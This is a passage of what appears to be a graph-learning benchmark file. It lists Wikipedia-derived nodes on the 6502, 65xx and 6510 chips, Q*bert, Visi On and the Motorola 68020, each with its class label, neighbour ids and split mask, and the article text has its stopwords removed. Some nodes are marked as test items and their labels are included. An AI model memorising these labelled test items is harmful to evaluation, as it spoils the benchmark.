instruction decoding sequencing 8-bit microprocessors chip limited overlapping fetching execution low clock frequency moderated speed requirement memory peripherals attached cpu 50 clock cycle available memory access due asynchronous design fraction varied strongly among chip versions critical time affordable memory access times range original nmos 6502 minimalistically engineered efficiently manufactured therefore cheap—an important factor getting design wins price-sensitive game-console home-computer markets like precursor 6800 6502 registers 6502 registers include one 8-bit accumulator register two 8-bit index registers x 7 processor status flag bits p 8-bit stack pointer 16-bit program counter pc compares typical design era z80 eight general-purpose 8-bit registers combined four 16-bit ones order make somewhat lack registers 6502 included zero-page addressing mode uses one address byte instruction instead two needed address full 64 kb memory provides fast access first 256 bytes ram using shorter instructions chuck peddle said interviews specific intention allow first 256 bytes ram used like registers stack address space memory page 01 i.e address range 0100– 01ff 256–511 software access stack done via four implied addressing mode instructions whose functions push pop pull accumulator processor status register stack also used subroutine calls via jsr jump subroutine rts return subroutine instructions interrupt handling chip uses index stack registers effectively several addressing modes including fast direct page zero page mode similar found pdp-8 accesses memory locations addresses 0 255 single 8-bit address saving cycle normally required fetch high-order byte address —code 6502 uses zero page much code processors would use registers 6502-based microcomputers operating system os uses zero page leaving handful locations user addressing modes also include implied 1-byte instructions absolute 3 bytes indexed absolute 3 bytes indexed zero-page 2 bytes relative 2 bytes accumulator 1 indirect x indirect 2 immediate 2 absolute mode general-purpose mode branch instructions use signed 8-bit offset relative instruction branch numerical range −128..127 therefore translates 128 bytes backward 127 bytes forward instruction following branch 126 bytes backward 129 bytes forward start branch instruction accumulator mode uses accumulator effective address need operand data immediate mode uses 8-bit literal operand indirect modes useful array processing looping 5/6 cycle indirect mode 8-bit register added 16-bit base address read zero page located single byte following opcode register therefore index register sense used hold actual index opposed x register 6800 base address directly stored immediate offset could added incrementing index register walk array byte-wise takes two additional cycles less frequently used indirect x mode effective address operation found zero page address formed adding second byte instruction contents x register using indexed modes zero page effectively acts set 128 additional though slow address registers 6502 capable performing addition subtraction binary binary-coded decimal placing cpu bcd mode codice_1 set flag instruction results decimal arithmetic codice_2 would result 00 carry c flag set binary mode codice_3 clear flag operation would result 9a carry flag cleared atari basic bcd mode seldom used home-computer applications see article simple characteristic example 6502 assembly language 6502 instruction operation codes opcodes eight-bits long general form aaabbbcc aaa cc define opcode bbb defines addressing mode instance consider codice_4 instruction performs bitwise bits accumulator another value instruction opcode form 000bbb01 bbb may 010 immediate mode value constant 001 zero page fixed address 011 absolute address pattern absolute number exceptions however apply allows one easily deconstruct opcode values back assembler mnemonics majority instructions handling edge cases special-purpose code 256 possible opcodes available using 8-bit pattern original 6502 uses 151 organized 56 instructions possibly multiple addressing modes depending instruction addressing mode opcode may require zero one two additional bytes operands hence 6502 machine instructions vary length one three bytes operand stored 6502 customary little-endian format 65c816 16-bit cmos version 6502 also supports 24-bit addressing results instructions assembled three-byte operands also arranged little-endian format remaining 105 opcodes undefined original design instructions low-order 4-bits nibble 3 7 b f used providing room future expansion likewise 2xxx column single entry codice_5 remaining 25 empty slots distributed empty slots used 65c02 provide new instructions well variations existing ones new addressing modes fxxx instructions initially left free allow 3rd party vendors add instructions later versions 65c02 standardized set bit fiddling instructions developed rockwell semiconductor 6502 assembly language statement consists three-character instruction mnemonic followed operands instructions take separate operand target single register based addressing mode combine target register instruction mnemonic assembler uses codice_6 opposed codice_7 increment x register processor non-maskable interrupt nmi input edge sensitive means interrupt triggered falling edge signal rather level implication feature wired-or interrupt circuit readily supported however also prevents nested nmi interrupts occurring hardware makes nmi input inactive often control nmi interrupt handler simultaneous assertion nmi irq maskable hardware interrupt lines causes irq ignored however irq line remains asserted servicing nmi processor immediately respond irq irq level sensitive thus sort built-in interrupt priority established 6502 design break flag processor different flag bits flag setting resetting testing instructions affected php plp instructions exists stack brk php always write 1 irq nmi always write 0 input pin asserted set processor overflow status bit deasserting clear overflow bit however used high-speed polling device driver poll hardware three cycles using branch-on-overflow-clear codice_8 instruction branches example commodore 1541 commodore floppy disk drives use technique detect without delay whether serializer ready accept provide another byte disk data obviously great care must used device driver associated system design spurious assertion overflow bit could ruin arithmetic processing several variants nmos 6502 mos technology 6512 6513 6514 6515 rely external clock instead using internal clock generator like 650x e.g 6502 used advantage designs clocks could run asymmetrically increasing overall cpu performance 6512 used bbc micro b+64 western design center designed currently produces w65c816s processor 16-bit static-core successor 65c02 greatly enhanced features w65c816s newer variant 65c816 core apple ii computer basis ricoh 5a22 processor powered popular super nintendo entertainment system w65c816s incorporates minor improvements 65c816 make newer chip exact hardware-compatible replacement earlier one currently available electronics distributors november 2017 w65c816s rated 14-megahertz operation western design center also designed produced 65c802 65c816 core 64-kilobyte address space 65 c 02 pin-compatible package 65c802 could retrofitted 6502 board would function 65c02 power-up operating emulation mode 65c816 two-instruction sequence would switch 65c802 native mode operation exposing 16 bit accumulator index registers well 65c816 enhanced features 65c802 widely used new designs almost always built around 65c816 resulting 65c802 production discontinued following 6502 assembly language source code subroutine named codice_10 copies null-terminated character string one location another converting upper-case letter characters lower-case letters string copied source string converted source stored destination 6502 several bugs quirks accounted programming",
    "neighbors": [
      7170,
      1029,
      7173,
      7691,
      8715,
      8716,
      9739,
      10767,
      532,
      7188,
      8732,
      10784,
      10786,
      3630,
      11314,
      2623,
      6210,
      7235,
      2638,
      3157,
      5717,
      602,
      5733,
      7269,
      5736,
      2665,
      11374,
      10351,
      5744,
      7282,
      7283,
      7284,
      1660,
      8830,
      8834,
      11395,
      3722,
      10891,
      1170,
      9363,
      11411,
      6807,
      664,
      4764,
      8352,
      4773,
      6821,
      682,
      2224,
      9911,
      5823,
      10945,
      712,
      3272,
      9928,
      3788,
      6352,
      10969,
      5340,
      5862,
      11494,
      6889,
      9964,
      8429,
      5358,
      1776,
      2811,
      1798,
      5384,
      6925,
      7445,
      5400,
      4385,
      5412,
      5925,
      8484,
      10533,
      8494,
      11054,
      2874,
      3904,
      10052,
      9549,
      5457,
      6485,
      9563,
      1376,
      6499,
      6502,
      5995,
      372,
      1405,
      7589,
      9638,
      6063,
      3002,
      3010,
      8136,
      6607,
      8143,
      9685,
      4569,
      477,
      6109,
      5604,
      5617,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 7282,
    "label": 3,
    "text": "MOS_Technology_65xx:mos technology 65xx mos technology 65xx series family 8-bit microprocessors mos technology based motorola 6800 introduced ca 1975 65xx family included 6502 used home computers commodore pet vic-20 apple ii atari 800 british bbc micro 6501 6502 40-pin dip packages 6503 6504 6505 6507 28-pin dip versions reduced chip circuit board cost 28-pin versions pin count reduced leaving high-order address pins various combinations function pins making functions unavailable typically 12 pins omitted three n.c. pins one two vss pins one clock pins sync pin s.o pin either maskable interrupt nmi four most-significant address lines a12–a15 12 pins omitted reduce pin count 40 28 omission four address pins reduces external addressability 4 kb 64 kb 6502 though internal pc register effective address calculations remain 16-bit 6507 omits interrupt pins order include address line a12 providing 8 kb external addressability interrupt capability 6507 used popular atari 2600 video game console design divides 8 kb memory space half allocating lower half console internal ram peripherals upper half game cartridge™ atari 2600 cartridges 4 kb address limit capacity limit unless cartridge contains bank switching circuitry one popular 6502 based computer commodore 64 used modified 6502 cpu 6510 unlike 6503–6505 6507 6510 40-pin chip adds internal hardware 8-bit parallel i/o port mapped addresses 0000 0001 6508 another chip like 6510 adds internal hardware 256 bytes sram 8-bit i/o port featured 6510 though chips reduced pin counts compared 6502 need 8 new pins added parallel i/o port case address lines among 8 removed pins",
    "neighbors": [
      11395,
      10767,
      664,
      10784,
      4385,
      10786,
      7589,
      11054,
      3010,
      11601,
      3157,
      6485,
      10969,
      9563,
      5862,
      10351,
      1776,
      5617,
      7281,
      7284
    ],
    "mask": "None"
  },
  {
    "node_id": 7283,
    "label": 3,
    "text": "Q*bert:q*bert q*bert arcade game developed published north american market gottlieb 1982 2d action game puzzle elements uses isometric graphics create pseudo-3d effect objective level game change color every cube pyramid making q*bert on-screen character hop top cube avoiding obstacles enemies players use joystick control character game conceived warren davis jeff lee lee designed title character original concept developed implemented davis q*bert developed project name cubes q*bert well-received arcades among critics game gottlieb successful video game among recognized brands golden age arcade games ported numerous platforms game success resulted sequels use character likeness merchandising appearances lunch boxes toys animated television show q*bert character became known swearing – incoherent phrase made synthesized speech generated sound chip speech balloon nonsensical characters appear collides enemy game developed period columbia pictures owned gottlieb intellectual rights q*bert remained columbia even divested gottlieb assets 1984 therefore rights owned sony pictures entertainment since parent sony acquired columbia 1989 q*bert appeared disney computer-animated film wreck-it ralph license sony later appeared columbia live-action film pixels 2015 q*bert action game puzzle elements played axonometric third-person perspective convey three-dimensional look game played using single diagonally mounted four-way joystick player controls q*bert starts game top pyramid made 28 cubes moves hopping diagonally cube cube landing cube causes change color changing every cube target color allows player progress next stage beginning jumping every cube enough advance later stages cube must hit twice reach target color times cubes change color every time q*bert lands instead remaining target color reach elements combined subsequent stages jumping pyramid results character death player impeded several enemies introduced gradually game collision purple enemies fatal character whereas green enemies removed board upon contact colored balls occasionally appear second row cubes bounce downward contact red ball lethal q*bert contact green one immobilizes on-screen enemies limited time multicolored floating discs either side pyramid serve escape danger particularly coily q*bert jumps disc transports top pyramid coily close pursuit character jump q*bert fall death awarding bonus points causes enemies balls screen disappear though start return seconds points awarded color change 25 defeating coily flying disc 500 remaining discs end stage higher stages 50 100 catching green balls 100 slick sam 300 bonus points also awarded completing screen starting 1,000 first screen level 1 increasing 250 subsequent completion 5,000 level 4 extra lives granted reaching certain scores set machine operator programmer warren davis wrote inspired pattern hexagons implemented fellow gottlieb developer mad planets designer kan yabumoto different telling initial concept began artist jeff lee drew pyramid cubes inspired m. c. escher lee believed game could derived artwork created orange armless main character character jumped along cubes shot projectiles called mucus bombs tubular nose enemies enemies included blue creature later changed purple named wrong way orange creature later changed green named sam lee drawn similar characters since childhood inspired characters comics cartoons mad magazine artist ed big daddy roth q*bert design later included speech balloon string nonsensical characters lee originally presented joke warren davis hired work game protector noticed lee ideas asked could use practice programming randomness gravity game mechanics thus added balls bounce pyramid top bottom davis still learning program game mechanics wanted keep design simple also believed games complex control schemes frustrating wanted something could played one hand accomplish davis removed shooting changed objective saving protagonist danger davis worked game one night gottlieb vice president engineering ron waxman noticed suggested change color cubes game character landed davis implemented unique control scheme four-way joystick rotated 45° match directions q*bert jumping staff members gottlieb urged conventional orientation davis stuck decision davis remembered started programming april 1982 project put schedule actual product several months later mos technology 6502 chip operates 894 khz generates sound effects speech synthesizer votrax generates q*bert incoherent expressions audio system uses 128 b random-access memory 4 kb erasable programmable read memory store sound data code implement like gottlieb games sound system thoroughly tested ensure would handle daily usage retrospect audio engineer david thiel commented testing minimized time available creative designing thiel tasked using synthesizer produce english phrases game however unable create coherent phrases eventually chose string together random phonemes instead thiel also believed incoherent speech good fit q*bert speech balloon following suggestion technician rick tighe pinball machine component included make loud sound character falls pyramid sound generated internal coil hits interior cabinet wall foam padding added area contact cabinet developers decided softer sound better matched fall rather loud knocking sound cost installing foam however expensive padding omitted gottlieb staff difficulty naming game aside project name cubes untitled development process staff agreed game named main character disagreed name lee title initial concept— snots boogers —was rejected list suggestions compiled company employees according davis vice president marketing howie rubin championed title although staff members argued silly would impossible pronounce early test models produced title units artwork meeting hubert suggested staff member thought combining cubes hubert cubert art director richard tracy changed name q-bert hyphen later changed asterisk retrospect davis expressed regret asterisk prevented name becoming common crossword term wildcard character search engines development neared production stage q*bert underwent location tests local arcades preliminary title widely distributed according jeff lee oldest written record attesting game playable public location brunswick bowling alley dates back september 11 1982 gottlieb also conducted focus groups designers observed players one-way mirror control scheme received mixed reaction play testing players adapted quickly others found frustrating initially davis worried players would adjust different controls players would unintentionally jump pyramid several times reaching game ten seconds players however became accustomed controls playing several rounds game different responses controls prompted davis reduce game level difficulty—a decision would later regret copyright claim registered united states copyright office gottlieb february 10 1983 cites date publication q*bert october 18 1982 video games reported game sold directly arcade operators public showing amoa show held november 18–20 1982 gottlieb offered machines 2600 per unit q*bert gottlieb fourth video game q*bert gottlieb video game gathered huge critical commercial success selling around 25,000 arcade cabinets cabaret cocktail versions game later produced machines since become collector items rarest cocktail versions game first introduced wider industry audience november 1982 amoa show immediately received favorably press video games placed q*bert first list top ten hits describing unusual exciting game show stating operator dared walk away without buying least one coin slot reported gottlieb game q*bert one stars show predicted game well contemporaneous reviews equally enthusiastic focused uniqueness gameplay audiovisual presentation roger c. sharpe electronic games considered potential arcade award winner coin-op game year praising innovative gameplay outstanding graphics william brohaugh creative computing video arcade games described game all-round winner many strong points praised variety sound effects graphics calling colors vibrant brohaugh lauded q*bert inventiveness appeal stating objective interesting unique michael blanchet electronic fun suggested game might push pac-man spotlight 1983 neil tesser video games also likened q*bert japanese games like pac-man donkey kong due focus characters animation story lines well absence violence computer video games magazine praised game graphics colors electronic games awarded q*bert innovative coin-op game year video game player called funniest game year among arcade games 1983 q*bert continues widely recognized significant part video game history author steven kent gamespy william cassidy considered q*bert one memorable games time author david ellis echoed similar statements calling classic favorite 1up.com jeremy parish kim wild retro gamer magazine described game difficult yet addictive author john sellers also called q*bert addictive praised sound effects three-dimensional appearance graphics cassidy called game unique challenging attributed challenge part control scheme ign jeremy dunham believed controls poorly designed describing unresponsive struggle nonetheless considered game addictive main character also received positive press coverage edge magazine attributed success game title character stated players could easily relate q*bert particularly swore computer video games however considered swearing negative character appealing cassidy believed game appeal lay main character described q*bert cute personality made stand comparison popular video game characters authors high score referred q*bert ultra-endearing alien hopmeister cutest game character 1982 1982 amoa show parker brothers secured license publish home conversions q*bert arcade game parker first published port atari 2600 end 1983 company also advertised versions atari 5200 intellivision colecovision atari 8-bit computer family commodore vic-20 texas instruments ti-99/4a commodore 64 release commodore 64 version noted lag behind others appeared 1984 parker brothers also translated game stand-alone tabletop electronic game uses vfd screen since become rare collector item q*bert also published parker brothers philips videopac europe tsukuda original othello multivision japan ultra games nes north america initial home port atari 2600 widespread system time met mixed reactions video games warned buyers atari 2600 version may find little disappointed criticized lack music removing characters ugg wrongway system troubles handle character sprites screen steady performance later mark brownstein magazine favor game still cited presence fewer cubes game pyramidal layout pretty poor control negatives richardson electronic games noted lack audiovisual qualities counter-intuitive controls commended gameplay stating game comes much closer source inspiration surface evaluation indicates randi hacker electronic fun computers games called sterling adaption 2008 however ign levi buchanan rated fourth worst arcade port atari 2600 mostly due lack jumping animations enemies instead pop instantly adjacent cube making impossible know direction travel land entertainment weekly called q*bert one top ten games atari 2600 2013 saying port lost cool isometric perspective none addictive gameplay home versions well-received exceptions colecovision version electronic fun computers games noted q*bert aficionados disappointed marc brownstein video games called one best authorized versions warren davis also considered colecovision version accurate port arcade mark brownstein judged atari 5200 version inferior colecovision due imprecision atari 5200 controller noted tend grow video games determined intellivision version worst available ports criticizing system controller inadequate game antic magazine david duberman called atari 8-bit version one finest translations arcade game home computer format arthur leyenberger creative computing listed runner-up best arcade adaptation system praising faithful graphics sound movement playability softline critical criticizing atari version controls lack swearing magazine concluded home computer game n't sense style one arcades ... execution n't 1984 magazine readers named game fifth-worst atari program 1983 computer games called c64 version absolutely terrific translation almost totally duplicates arcade game aside lack synthesized speech stand-alone tabletop awarded stand-alone game year electronic games 2003 version java-based mobile phones announced sony pictures mobile reviewers generally acknowledged faithful port arcade original criticized controls modojo robert falcon stated diagonal controls take time adapt cell phone traditional directions michael french pocket gamer concluded ca n't escape fact n't exactly fit mobile graphics certainly spruced-up sound effects timeless ... really little perfect conversion airgamer criticized gameplay monotonous difficulty frustrating contrast wireless gaming review called one best mobile retro roundup february 22 2007 q*bert released playstation 3 playstation network features upscaled filtered graphics online leaderboard players post high-scores sixaxis motion controls game received mixed reception dunham gerstmann enjoy motion controls said title nostalgic players eurogamer.net richard leadbetter judged game elements simplistic repetitive make worthwhile 2007 contrast parish considered title worth purchasing citing addictive gameplay according jeremy parish q*bert one higher-profile titles classic era describing q*bert legacy jeff gerstmann gamespot referred game rare arcade success 2008 guinness world records ranked behind 16 arcade games terms technical creative cultural impact though successful creators game receive royalties gottlieb program place time davis lee nonetheless expressed pride game continuing remembered fondly q*bert became one merchandised arcade games behind pac-man although according john sellers nearly successful franchise donkey kong character likeness appears various items including coloring books sleeping bags frisbees board games wind-up toys stuffed animals flyer distributed 1983 gottlieb claimed 125 licensed products however north american video game crash 1983 depressed market game popularity began decline 1984 years following release q*bert inspired many games similar concepts magazines video games computer games commented trend features q*bert -like games 1984 listed mr cool sierra on-line frostbite activision q-bopper accelerated software juice tronix quick step imagic flip flop boing first star software pharaoh pyramid master control software pogo joe screenplay rabbit transit starpath games inspired q*bert titles identified q*bert -like games include cubit micromax j-bird orion software uk bouncer acornsoft hubert blaby computer games pogo ocean spellbound beyond vector hopper kristof tuts 1983 q*bert adapted animated cartoon part saturday supercade cbs features segments based video game characters golden age video arcade games saturday supercade produced ruby-spears productions q*bert segments 1983 1984 show set united states 1950s era town called q-burg stars q*bert high school student altered include arms hands jacket sneakers shoots black projectiles nose calls slippy dew make enemies slip characters frequently say puns add letter q words q*bert themes characters appear essential 2012 3d disney computer-animated film wreck-it ralph 2015 sony film pixels 2014 q*bert makes cameo appearance radioshack super bowl xlviii commercial '80s called q*bert seen played 1984 film moscow hudson starring robin williams 1993 ibm pc role-playing game features segment player solve pyramid puzzle homage q*bert 2009 action-adventure game q*bert arcade cabinet seen ghostbusters headquarters game referenced several animated television series family guy futurama simpsons robot chicken mad south park november 28 1983 rob gerhardt reached record score 33,273,520 points q*bert marathon held almost 30 years george leutz brooklyn new york played one game q*bert eighty-four hours forty-eight minutes february 14–18 2013 richie knucklez arcade flemington new jersey scored 37,163,080 points doris self credited guinness world records oldest competitive female gamer set tournament record score 1,112,300 q*bert 1984 age 58 record surpassed drew goins june 27 1987 score 2,222,220 self continually attempted regain record death 2006 november 18 2012 george leutz broke q*bert tournament world record live kong 2 event 1up arcade bar denver colorado leutz scored 3,930,990 points eight hours earning 1.5 million points first life beating self score using single life leutz score verified twin galaxies video ends score 3.7 million points 1,500,000 points previous record believing original game easy davis initiated development faster harder challenging q*bert also known fhmc q*bert 1983 increases difficulty introduces q*bertha adds bonus round however project canceled game never entered production davis released fhmc q*bert rom image sqbert.zip onto web december 1996 gottlieb also released pinball game q*berts quest based arcade version features two pairs flippers x formation audio arcade gottlieb produced fewer 900 units several video game sequels released years reach level success original first titled q*bert qubes shows copyright 1983 title screen whereas instruction manual cites 1984 copyright manufactured mylstar electronics uses hardware original game features q*bert introduces new enemies meltniks shoobops rat-a-tat-tat player navigates protagonist around plane cubes avoiding enemies jumping cube causes rotate changing color visible sides cube goal match line cubes target sample later levels require multiple rows match though part popular franchise game release hardly noticed parker brothers showcased home versions q*bert qubes winter consumer electronics show january 1985 q*bert qubes ported colecovision atari 2600 konami distributed original q*bert japanese arcades 1983 produced game title q*bert msx computers 1986 released japan europe however main character little dragon mechanics based q*bert qubes contrary mylstar arcade game 50 stages different pattern cubes addition known rule extensions later stages competitive 2-player mode assigns side different pattern players score points either completing pattern first pushing board 1992 handheld game developed realtime associates published jaleco 1992 features 64 boards different shapes q*bert 3 snes also developed realtime associates released 1992 jeff lee creator q*bert character also worked graphics game q*bert 3 features gameplay similar original like game boy game larger levels varying shapes addition enemies first game introduces several new enemies frogg top hat derby published ntvic q*bert playable character game ntvic started contest electronic gaming monthly magazine consisting three questions game reader answer questions mail egm first winner answer questions correctly first prize consisting snes console copy q*bert 3 copy strike gunner s.t.g snes egm t-shirt first five contestants came second place latter two prizes 2004 sony pictures released sequel adobe flash titled q*bert 2004 containing faithful rendition original arcade game along 50 levels use new board layouts six new visual themes q*bert deluxe ios devices initially released rendition arcade game later received updates themes stages q*bert 2004 2005 sony pictures released q*bert 2005 download windows flash browser applet featuring 50 different levels july 2 2014 gonzo games sideline amusement announced q*bert rebooted released steam ios android versions playstation 3 playstation 4 playstation vita released february 17 2015 north america february 18 2015 europe released february 12 2016 xbox one according mark caplan vice president consumer products worldwide marketing distribution sony pictures entertainment release motivated renewed interest q*bert part due cameo recent wreck-it ralph animated feature film q*bert rebooted contains port classic arcade game alongside new playing mode uses hexagonal shapes increasing number possible movement directions six additionally 'rebooted mode features new enemy types including boxing glove punches q*bert levels treasure chest tries avoid game 5 different stage designs spread across 40 levels contain three rounds bonus round completed 5 lives gems collected unlock different skins q*bert character completing levels multiple times reaching specific time score goals awarded stars enable access levels",
    "neighbors": [
      8193,
      488,
      8937,
      3533,
      9006,
      2383,
      1776,
      7281,
      7283,
      10644,
      10931,
      5820,
      3039
    ],
    "mask": "None"
  },
  {
    "node_id": 7284,
    "label": 3,
    "text": "MOS_Technology_6510:mos technology 6510 mos technology 6510 8-bit microprocessor designed mos technology modified form successful 6502 6510 widely used commodore 64 home computer variants primary change 6502 addition 8-bit general purpose i/o port although six i/o pins available common version 6510 addition address bus could made tristate c64 extra i/o pins processor used control computer memory map bank switching controlling three four signal lines datasette tape recorder electric motor control key-press sensing write data lines read data line went another i/o chip possible writing correct bit pattern processor address 01 completely expose almost full 64 kb ram c64 leaving rom i/o hardware exposed except processor i/o port data directional register 1985 mos produced 8500 hmos version 6510 process modification virtually identical nmos version 6510 8500 originally designed use modernised c64 c64c however 1985 limited quantities 8500s found older nmos-based c64s finally made official debut 1987 appearing motherboard using new 85xx hmos chipset 7501/8501 variant 6510 introduced 1984 compared 6510 variant extends number i/o port pins 6 8 omits pins non-maskable interrupt clock output.. used commodore c16 c116 plus/4 home computers i/o port controlled datasette also cbm bus interface main difference 7501 8501 cpus manufactured slightly different processes 7501 manufactured hmos-1 8501 hmos-2 2 mhz-capable 8502 variant used commodore 128 cpus opcode compatible including undocumented opcodes commodore 1551 disk drive used 6510t version 6510 eight i/o lines nmi rdy signals available",
    "neighbors": [
      11395,
      8715,
      10767,
      664,
      10784,
      4385,
      7589,
      8494,
      11054,
      2874,
      3010,
      2383,
      3157,
      6485,
      10969,
      9563,
      5862,
      10351,
      1776,
      5617,
      7281,
      7282,
      372,
      1660
    ],
    "mask": "Test"
  },
  {
    "node_id": 7285,
    "label": 2,
    "text": "Visi_On:visi visicorp visi short-lived highly influential graphical user interface-based operating environment program ibm compatible personal computers running ms-dos although visi never popular steep minimum system requirements day major influence later development microsoft windows spring 1981 personal software cash-flush ever-increasing sales visicalc corporate directors sat planned future directions ed esber introduced concept family products could sold together technical perspective none products similar anything name instance use visiplot visicalc data numbers plotted exported raw format re-imported dan fylstra led technical discussion sorts actions user would need able accomplish order products truly integrated decided three key concepts one universal data exchange would supported set common data structures used programs another common consistent interface users would re-learn ui moved one program another finally fylstra concerned time needed move one program another long useful – user needing quickly look something visidex would save exit visicalc look information quit re-launch visicalc process made quicker simpler july 1981 xerox announced xerox star advanced workstation computer featuring graphical user interface point well known secret apple computer working low-cost computer gui would later released apple lisa personal software president terry opdendyk knew two-man team texas working gui arranged scott warren dennis abbe visit personal software headquarters sunnyvale california demonstrated version smalltalk programming language running trs-80 microcomputer seriously underpowered machine task personal software extremely impressed contract soon signed work project quasar started almost immediately name shortly thereafter changed visi play vision retained visi naming experimental port ill-fated apple iii completed november development work shifted dec vax cross-compilers number different machines early 1982 personal software changed name visicorp betting much future success company visi visi many features modern gui included become common many years later fully mouse-driven used bit-mapped display text graphics included on-line help allowed user open number programs window visi however include graphical file manager visi also demanded hard drive order implement virtual memory system used fast switching time hard drives expensive piece equipment tom powers visicorp new vp marketing pushed system demonstrated fall comdex show 1982 others company worried product ready shipping showing early would leave potential customers distributors upset n't ready soon another concern visiword released show worry might lost shuffle demonstrations comdex huge success many viewers told simply movie watching bill gates speculated pc fact simply terminal real machine like vax became one talked-about products industry however huge success led number serious problems separate june july 1983 byte articles company mentioned late summer 1983 release visi development continued visicorp entity process self-destruction terry opdendyk president hand-picked early venture capital investors extremely autocratic management style led departure many key executives late 1981 eventual release visi product management company left notably mitch kapor charge visicalc development ed esber roy folk visi product marketing manager among others referred corporate civil war mitch kapor departure would prove devastating company however kapor developer visiplot visitrend pressing development greatly improved spreadsheet succeed visicalc opdendyk uninterested time visicorp visicalc developers impasse visicalc growing increasingly outdated kapor decided leave executives pressed clause forbidding kapor work integrated spreadsheet opdendyk could n't bothered exclaiming kapor spaghetti programmer denigrating abilities kapor would go release lotus 1-2-3 became major competitor visicalc 1983 end year sales cut half combined exodus major portions senior executive staff ongoing battle visicalc developers visicorp soon serious financial difficulty hopes company future placed visi october 31 1983 infoworld article titled finally visi flatly stated ... publisher putting product computer store shelves ... visi scheduled available last week october november 14 1983 issue said visicorp released visi however july 2 1984 issue says time visi actually shipped december 16 1983 ... pc magazine reported february 7 1984 issue still n't received product commercially available form operating system known visi applications manager released december 1983 sold 495 requiring mouse another 250 main disadvantage visi extremely high system requirements 1982 standards needed 512 kilobytes ram hard disk time pcs shipped 64k-128k ibm yet offer hard disk pc ibm first model hard drive pc xt n't ship march 1983 third-party drives however available time typically 5mb units connected floppy controller treated operating system oversized floppy disk subdirectory support brought total cost running visi 7500 three-quarters cost apple lisa press continued laud product going far claim represented end operating systems end-users less impressed however due high cost required hardware also general slowness system market computers generally used one two tasks usually business related whole purpose visi seriously diluted january 1984 apple computer released macintosh much fanfare although macintosh seriously lacking software faster cheaper included one feature visi lacked graphical file manager finder although n't compete directly visi really pc product nevertheless demonstrated gui could indeed fast relatively inexpensive visi failed deliver adding release problems bill gates took page visicorp book announced product microsoft windows would available may 1984 muddied waters significantly notably claimed would similar feature set n't require hard disk cost 250 windows released even longer delay visi shipping november 1985 lacking features forced visi demand hard drive eight visicorp employees still developing visi visicorp sold source code control data mid-1984 raise cash sued software arts continuing sell software sales apparently slow february 1985 visicorp responded lowering price basic os 99 knowing anyone purchasing would also need buy applications bundled three 990 improved situation somewhat sales still far projections certainly helping company stave problems due lotus 1-2-3 following declining visicalc sales low revenues visi november 1985 company merged paladin software new company kept paladin name visicorp line visiproducts history official system requirements visi work newer pcs requires compatible mouse hard disk partition 15mb fat12 file system supported addition revectors irqs used pc/ats later visionxt.exe requires modifications prevent graph applications functioning properly visi required mouse systems-compatible mice microsoft-compatible pc mice time became standard introduced later may 1983 visi used two mouse drivers first loaded text mode made mouse registers accessible embedded driver translated coordinates cursor position internal driver built-in subroutine visionxt.exe required mouse systems pc-mouse pointing device compatible microsoft mouse standard writing visi applications required unix development environment visi targeted toward high-end expensive pc workstations visi applications written subset c visic third-party could ported core software visihost visimachine virtual machine visionxt.exe ibm pc dos version unix never occurred 1984 visicorp assets sold control data corporation making working copies original floppy disks using modern methods difficult protected using pre-created bad sectors methods floppy disk identification",
    "neighbors": [
      2560,
      10757,
      6155,
      4114,
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      9784,
      10809,
      576,
      2625,
      6221,
      3160,
      10333,
      97,
      11363,
      6760,
      10856,
      8298,
      9835,
      8301,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      242,
      5363,
      9466,
      2811,
      9468,
      1278,
      10499,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      5452,
      6988,
      2383,
      5457,
      11601,
      7507,
      7511,
      8540,
      10590,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11667,
      11675,
      8092,
      2462,
      5022,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      10676,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      10730,
      10731,
      8687,
      6128,
      5105,
      6129,
      5619,
      5115,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7286,
    "label": 3,
    "text": "Motorola_68020:motorola 68020 motorola 68020 sixty-eight-oh-twenty sixty-eight-oh-two-oh six-eight-oh-two-oh 32-bit microprocessor motorola released 1984 successor motorola 68010 succeeded motorola 68030 lower cost version also made available known 68ec020 keeping naming practices common motorola designs 68020 usually referred 020 pronounced oh-two-oh oh-twenty 68020 32-bit internal external data address buses compared early 680x0 models 16-bit data 24-bit address buses 68020 alu also natively 32-bit could perform 32-bit operations one clock whereas 68000 took two clocks minimum due 16-bit alu newer packaging methods allowed '020 feature external pins without large size earlier dual in-line package method required 68ec020 lowered cost 24-bit address bus 68020 produced speeds ranging 12 mhz 33 mhz 68020 added many improvements 68010 including 32-bit arithmetic logic unit alu 32-bit external data address buses extra instructions additional addressing modes 68020 68030 proper three-stage pipeline though 68010 loop mode sped loops effectively tiny instruction cache held two short instructions thus little used 68020 replaced proper instruction cache 256 bytes first 68k series processor feature true on-chip cache memory previous 68000 68010 processors could access word 16-bit long word 32-bit data memory word-aligned located even address 68020 alignment restrictions data access naturally unaligned accesses slower aligned accesses required extra memory access 68020 coprocessor interface supporting eight coprocessors main cpu recognizes f-line instructions four significant opcode bits one uses special bus cycles interact coprocessor execute instructions two types coprocessors defined floating point units mc68881 mc68882 fpus paged memory management unit mc68851 pmmu one pmmu used cpu principle multiple fpus could used cpu commonly done coprocessor interface asynchronous possible run coprocessors different clock rate cpu multiprocessing support implemented externally use rmc pin indicate indivisible read-modify-write cycle progress processors hold memory accesses cycle complete software support multiprocessing included tas cas cas2 instructions multiprocessor system coprocessors could shared cpus avoid problems returns coprocessor bus error address error exceptions generally necessary multiprocessor system cpus model fpus model well new instructions included minor improvements extensions supervisor state several instructions software management multiprocessing system removed 68060 support high-level languages get used much removed future 680x0 processors bigger multiply 32×32→64 bits divide 64÷32→32 bits 